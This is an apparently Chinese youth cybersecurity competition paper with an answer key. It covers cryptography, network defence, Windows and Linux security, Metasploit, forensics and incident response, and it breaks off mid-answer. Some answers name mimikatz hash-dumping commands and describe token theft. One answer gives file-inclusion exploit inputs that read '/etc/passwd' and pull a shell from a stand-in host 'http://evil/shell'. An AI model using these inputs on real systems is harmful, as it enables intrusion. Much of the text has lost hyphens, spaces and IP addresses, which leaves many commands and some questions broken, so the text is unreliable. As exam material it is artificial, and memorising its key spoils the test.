2025年青少年计算机竞赛与考级《网络安全》真题及答案

2025年青少年计算机竞赛与考级《网络安全》练习题及答案1.单项选择题（每题1分，共20分。每题只有一个正确答案，请将正确选项字母填入括号内）1.1在TLS1.3握手过程中，最先由客户端发送的报文是（）A.ClientHello  B.ServerHello  C.ChangeCipherSpec  D.Finished答案：A1.2下列哪一项最能有效降低CSRF攻击的成功率（）A.启用HTTPS  B.使用SameSiteCookie属性  C.部署WAF  D.增加密码复杂度答案：B1.3关于SHA256与MD5的对比，下列说法正确的是（）A.两者输出长度相同  B.MD5抗碰撞性优于SHA256  C.SHA256输出256bit  D.两者均属于对称加密算法答案：C1.4在Linux系统中，若文件权限为“rwxrsrx”，则该文件的SGID位表现为（）A.无SGID  B.SGID且作用于文件  C.SGID且作用于目录  D.SUID答案：B1.5下列端口中，默认用于LDAPS的是（）A.389  B.636  C.3268  D.3389答案：B1.6利用“arps”命令静态绑定IPMAC对应关系，主要防御的攻击是（）A.IP欺骗  B.MACflooding  C.ARPspoofing  D.DHCPstarvation答案：C1.7在Windows日志中，事件ID4624表示（）A.账户登录失败  B.账户成功登录  C.权限提升  D.对象访问审计答案：B1.8下列关于零信任模型的描述，错误的是（）A.默认不信任任何主体  B.先连接后认证  C.动态策略决策  D.最小权限原则答案：B1.9使用nmap扫描时，参数“sS”的含义是（）A.TCPConnect扫描  B.SYN隐秘扫描  C.UDP扫描  D.版本探测答案：B1.10在公钥基础设施中，负责存储已撤销证书的是（）A.RA  B.CA  C.OCSP  D.CRL答案：D1.11下列哪条iptables规则可丢弃来自/24的ICMP报文（）A.iptablesAINPUTs/24picmpjDROPB.iptablesAOUTPUTd/24picmpjDROPC.iptablesAFORWARDs/24jREJECTD.iptablesAINPUTptcpdport22jACCEPT答案：A1.12关于内存安全语言Rust的特性，下列说法正确的是（）A.使用自动垃圾回收机制  B.编译期强制检查所有权  C.允许空指针任意解引用  D.不提供类型系统答案：B1.13在Android应用逆向中，smali代码对应的原始语言是（）A.C++  B.Java  C.Kotlin  D.Dart答案：B1.14下列哪项不是OWASPTop102021中的新条目（）A.不安全的设计  B.服务器端请求伪造  C.使用含有已知漏洞的组件  D.日志与监控不足答案：C1.15若Web服务器返回“PublicKeyPins”响应头，其目的是（）A.强制浏览器校验证书公钥  B.开启HSTS  C.关闭缓存  D.允许跨域答案：A1.16在密码学中，ECB模式的主要缺点是（）A.无法并行计算  B.相同明文块产生相同密文块  C.需要填充  D.需要IV答案：B1.17下列哪条命令可查看Windows本地安全策略（）A.lusrmgr.msc  B.secpol.msc  C.services.msc  D.devmgmt.msc答案：B1.18关于DNSSEC，下列说法正确的是（）A.使用DS记录建立信任链  B.加密DNS查询内容  C.提供数据机密性  D.依赖第三方VPN答案：A1.19在Metasploit中，命令“showpayloads”的作用是（）A.列出可用漏洞模块  B.列出兼容的攻击载荷  C.列出提权脚本  D.列出监听端口答案：B1.20下列哪项最能描述“威胁狩猎”与“事件响应”的区别（）A.前者主动后者被动  B.前者被动后者主动  C.两者均依赖SIEM告警触发  D.两者均不需要威胁情报答案：A2.多项选择题（每题2分，共20分。每题有两个或两个以上正确答案，多选、少选、错选均不得分）2.1以下哪些属于对称加密算法（）A.AES  B.3DES  C.ECC  D.RC4答案：ABD2.2可导致DNS缓存投毒的成功条件包括（）A.事务ID可预测  B.端口随机化未启用  C.权威服务器启用DNSSEC  D.递归服务器不检查TTL答案：ABD2.3关于HTTP严格传输安全（HSTS），下列说法正确的是（）A.首次访问仍需先通过HTTP  B.可包含在HTTPS响应头中  C.支持includeSubDomains指令  D.可设置preload列表答案：BCD2.4以下哪些技术可用于实现操作系统内核完整性度量（）A.TPM  B.SGX  C.UEFISecureBoot  D.DRTM答案：ACD2.5以下哪些属于常见的WebShell通信特征（）A.UserAgent固定为“Mozilla/5.0”  B.POST数据含base64编码  C.返回200状态码但内容长度异常  D.请求路径包含随机目录答案：BCD2.6关于社会工程学攻击，下列哪些属于“预文本”阶段的操作（）A.收集员工社交信息  B.伪造公司邮件域名  C.发送钓鱼链接  D.建立虚假客服电话答案：ABD2.7以下哪些命令可用于获取Windows系统本地哈希（）A.mimikatzlsadump::sam  B.hashdump  C.sekurlsa::logonpasswords  D.pwdump答案：ABCD2.8以下哪些端口与远程桌面协议直接相关（）A.3389  B.3390  C.2179  D.5357答案：ABC2.9以下哪些属于云原生安全责任共担模型中“租户”层面的责任（）A.对象存储桶访问策略  B.物理机房安保  C.虚拟机GuestOS补丁  D.数据分类与加密答案：ACD2.10以下哪些方法可用于检测SQL注入漏洞（）A.单引号报错测试  B.时间盲注  C.联合查询  D.目录遍历答案：ABC3.填空题（每空1分，共20分）3.1在RSA算法中，若p=17，q=19，则欧拉函数φ(n)=________。答案：2883.2使用nmap进行UDP端口扫描时，应添加的参数为________。答案：sU3.3在Linux中，用于强制重置用户密码过期命令是________。答案：chaged0用户名3.4在C语言中，可导致缓冲区溢出的危险函数包括gets与________。答案：strcpy3.5在PKCS5标准中，填充字节值为缺少的字节数，若缺3字节，则填充为________（十六进制）。答案：0x030x030x033.6在Wireshark过滤器中，仅显示源IP为且协议为TCP的表达式为________。答案：ip.src==&&tcp3.7在Windows中，用于查看当前登录用户SID的命令是________。答案：whoami/user3.8在OWASPZAP中，用于自动爬取站点目录的功能称为________。答案：Spider3.9在AES128中，密钥长度________bit，加密轮数________轮。答案：128；103.10在BGP安全扩展BGPsec中，用于保护ASPath完整性的机制是________签名。答案：路径（或ASPath）3.11在Linux内核中，用于限制进程系统调用的安全机制缩写为________。答案：seccomp3.12在AndroidManifest.xml中，声明应用不允许备份的属性为________。答案：android:allowBackup="false"3.13在Metasploit中，设置反向监听IP的命令为set________。答案：LHOST3.14在密码学中，DiffieHellman算法基于的数学难题是________。答案：离散对数3.15在HTTP响应头中，用于指示浏览器不要猜测MIME类型的头字段是________。答案：XContentTypeOptions:nosniff3.16在Windows日志中，清除安全日志的事件ID为________。答案：11023.17在iptables中，保存当前规则到文件的命令为________。答案：iptablessave>文件路径3.18在CVE编号中，2024年分配的漏洞格式为CVE________________。答案：2024NNNNNN（答前两位即可）3.19在云安全中，用于实例元数据服务未授权访问的缩写为________。答案：IMDS3.20在PHP中，关闭全局变量注册的旧版配置项为________。答案：register_globals4.简答题（每题6分，共30分）4.1简述TLS1.3相比TLS1.2在握手阶段的主要改进，并说明其对性能与安全的影响。答案：TLS1.3将握手由两次往返降为一次往返，并移除了RSA密钥交换，仅支持(EC)DHE，从而具备前向保密；同时精简了算法套件，移除弱加密算法如3DES、RC4、MD5等，减少攻击面；握手消息加密开始于第三次消息，提高了隐私性；性能上减少往返时延，提升移动端体验。4.2说明Windows本地权限提升中“令牌窃取”的基本原理，并给出一种防御措施。答案：令牌窃取利用进程打开令牌时未设置安全描述符，攻击者通过OpenProcessToken、DuplicateTokenEx获取高权限令牌，再调用CreateProcessWithTokenW启动新进程。防御措施包括：启用UAC并设置为最高级别，限制管理员登录，使用受保护的管理员（PAM）或CredentialGuard隔离令牌。4.3描述云存储桶公开读取数据泄露的场景，并给出AWSS3的修复命令。答案：场景：管理员误将BucketACL或BucketPolicy设置为“Principal”:“”且“Action”:“s3:GetObject”，导致匿名用户可下载对象。修复：awss3apiputbucketaclbucketmybucketaclprivate；再删除或修改含“Allow”的Policy，仅保留最小权限。4.4解释“代码签名证书”与“SSL证书”在验证目的、密钥用法、有效期三方面的差异。答案：代码签名用于验证软件发布者身份及完整性，密钥用法为DigitalSignature，有效期通常1–3年；SSL证书用于加密传输及验证服务器身份，密钥用法为KeyEncipherment/DigitalSignature，有效期现缩短至398天以内。4.5说明Linux内核模块rootkit的检测思路，并给出一条具体命令。答案：检测思路：对比系统调用表、检查模块链表是否被劫持、验证内核文本段哈希。命令：cat/proc/modules|sort>now.lst；重启到可信LiveCD再生成基准模块列表base.lst；diffnow.lstbase.lst查找异常模块。5.应用与综合题（共60分）5.1计算分析题（10分）已知某网站使用bcrypt(cost=12)存储密码哈希，服务器CPU为单核3GHz，实测每秒可计算4000次bcrypt。若攻击者拥有含1000万条哈希的泄露库，采用暴力破解8位小写字母+数字（36^8≈2.8×10^12）空间，请估算最坏情况下所需时间（年），并给出两种缓解方案。答案：总次数=2.8×10^12；每秒4000次，需7×10^8秒≈22.2年。缓解：1.增加cost因子至14，计算量提升4倍；2.启用多因素认证，使离线哈希失去意义。5.2漏洞分析题（10分）给出以下PHP代码片段：<?php$filename=$_GET['f'];include'/var/www/'.$filename.'.php';?>指出存在的漏洞类型，并给出两种利用方式及对应修复。答案：存在目录穿越+文件包含（LFI/RFI）。利用1：?f=../../../etc/passwd%00截断后包含系统文件；利用2：若allow_url_include=on，?f=http://evil/shell。修复：1.使用白名单数组in_array($filename,['home','about'])；2.关闭allow_url_include，并禁止空字节（PHP5.3.4已修复）。5.3网络取证题（10分）捕获文件show.pcapng中，发现一次HTTP上传，Wireshark导出对象得到ZIP，解压需密码。提示：密码为上传POST请求中参数“pass”值。请写出提取步骤与命令。答案：tsharkrshow.pcapngY'http.request.method==POST'Tfieldsetext|greppass→得到pass=H@ck2025；unzipPH@ck2025data.zip。5.4应急响应题（10分）生产服务器出现大量对外TCP445连接，/tmp/.xxx含未知二进制，crontabl显示每5分钟下载/a.sh。请给出应急处理流程（按时间顺序）。答案：1.隔离网络（关闭外网或改iptabl